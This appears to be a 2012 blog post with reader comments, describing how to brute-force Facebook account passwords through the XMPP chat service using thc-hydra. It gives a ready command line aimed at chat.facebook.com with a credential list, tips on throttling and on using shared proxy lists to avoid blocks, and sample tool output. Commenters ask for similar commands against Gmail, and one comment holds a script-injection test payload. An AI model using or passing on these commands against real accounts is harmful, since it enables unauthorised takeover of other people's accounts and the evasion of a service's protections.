Jul 192012

Just a short reminder, that you can easily brute force Facebook Accounts using the chat interface (XMPP) and thc-hydra (a very fast brute force tool, supports wordlists, too).

Since version 7.x XMPP support has been added, so be sure to have the latest version. (It compiles for XMPP out of the box, so even if you don’t have all the libraries for SSH/MySQL/… it might work.)

Here is an example of the command line:

hydra -C /tmp/username_pw_combo_list.txt -s 5222 -f -V -S chat.facebook.com xmpp

Thats it, but beware to throttle your attacks. After some wrong logins Facebook will block you from using XMPP. It will look like this in hydra:

Hydra v7.3 (c)2012 by van Hauser/THC & David Maciejak – for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2012-07-xx xx:xx:xx
[DATA] 1 task, 1 server, 994 login tries, ~994 tries per task
[DATA] attacking service xmpp on port 5222
[ATTEMPT] target chat.facebook.com – login “a@b.com” – pass “xxx” – 1 of 994 [child 0]
[RE-ATTEMPT] target chat.facebook.com – login “a@b.com” – pass “xxx” – 1 of 994 [child 0]
[RE-ATTEMPT] target chat.facebook.com – login “a@b.com” – pass “xxx” – 1 of 994 [child 0]
[ERROR] Too many connect errors to target, disabling xmpp://chat.facebook.com:5222
0 of 1 target successfuly completed, 0 valid passwords found
[ERROR] 1 target did not resolve or could not be connected
Hydra (http://www.thc.org/thc-hydra) finished at 2012-07-xx xx:xx:xx

This guy tweets a list of proxies if you need some ;)
Examples: http://pastebin.com/raw.php?i=EXUYq9Hh, http://pastebin.com/raw.php?i=BjbqBxJT, http://pastebin.com/raw.php?i=tkT45MBE

  7 Responses to “Hacking Facebook Accounts using thc-hydra (XMPP)”

  1. Can you please share the actual command syntax for facebook account.
    For example I am running hydra -S -l xxxxx@gmail.com -x 6:8:al -w 32 -e ns -V -s 465 smtp-gmail.com smtp for gmail account.

  2. ok if im looking to use a wordlist for a username i already know what would that look like

  3. can u tell the full method will correct codes because password is not showing it is coming in question marks

  4. interesting idea to avoid the security associated with the web login panel. Great!

  5. alert(“Hello”);

 Leave a Reply

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>